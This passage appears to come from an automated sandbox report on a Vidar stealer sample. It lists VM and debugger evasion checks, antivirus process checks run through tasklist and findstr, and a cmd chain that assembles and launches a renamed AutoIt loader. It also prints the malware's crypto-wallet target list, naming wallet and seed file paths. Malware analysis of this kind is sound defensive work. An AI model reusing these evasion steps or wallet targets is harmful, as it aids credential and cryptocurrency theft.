                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found stalling execution ending in API Sleep call
                    Source: C:\Users\user\Desktop\file.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifAPI coverage: 4.3 %
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B04005
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0C2FF
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00B0494A
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00B0CD9F
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0CD14 FindFirstFileW,FindClose,11_2_00B0CD14
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F5D8
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F735
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0FA36
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B03CE2
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AB5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00AB5D13
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\271973\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\271973Jump to behavior
                    Source: Amcache.hve.17.drBinary or memory string: VMware
                    Source: DHCBGD.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: crosoft.com/profileVMwarep
                    Source: DHCBGD.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: DHCBGD.11.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: DHCBGD.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: DHCBGD.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: file.exe, 00000000.00000003.2008656133.0000000000577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf
                    Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                    Source: DHCBGD.11.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 7MEDIAF~1abank.inMediaFoundationWidevineCdmVMwarexi5
                    Source: DHCBGD.11.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: DHCBGD.11.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: DHCBGD.11.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: DHCBGD.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Tenant.pif, 0000000B.00000002.4072894428.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: DHCBGD.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwarex
                    Source: file.exe, 00000000.00000003.2006125019.0000000000577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: DHCBGD.11.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: DHCBGD.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: DHCBGD.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                    Source: DHCBGD.11.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: DHCBGD.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: DHCBGD.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: DHCBGD.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: DHCBGD.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: DHCBGD.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: DHCBGD.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: DHCBGD.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: DHCBGD.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: DHCBGD.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: DHCBGD.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: DHCBGD.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: DHCBGD.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: Amcache.hve.17.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                    Source: DHCBGD.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: DHCBGD.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: DHCBGD.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: crosoft.com/profileVMwarepnacl
                    Source: DHCBGD.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B145D5 BlockInput,11_2_00B145D5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AB5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00AB5240
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00AD5CAC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AF88CD
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00ACA385
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00ACA354 SetUnhandledExceptionFilter,11_2_00ACA354

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF9369 LogonUserW,11_2_00AF9369
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AB5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00AB5240
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B01AC6 SendInput,keybd_event,11_2_00B01AC6
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B051E2 mouse_event,11_2_00B051E2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 271973Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "NorwegianLivedJerseyRelaxation" Para Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say CJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Tenant.pif CJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AF88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AF88CD
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00B04F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00B04F1C
                    Source: file.exe, 00000000.00000003.2009804495.00000000028C3000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp, Tenant.pif.2.dr, Neo.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Tenant.pifBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AC885B cpuid 11_2_00AC885B
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AE0030 GetLocalTime,__swprintf,11_2_00AE0030
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AE0722 GetUserNameW,11_2_00AE0722
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifCode function: 11_2_00AD416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00AD416A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                    Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
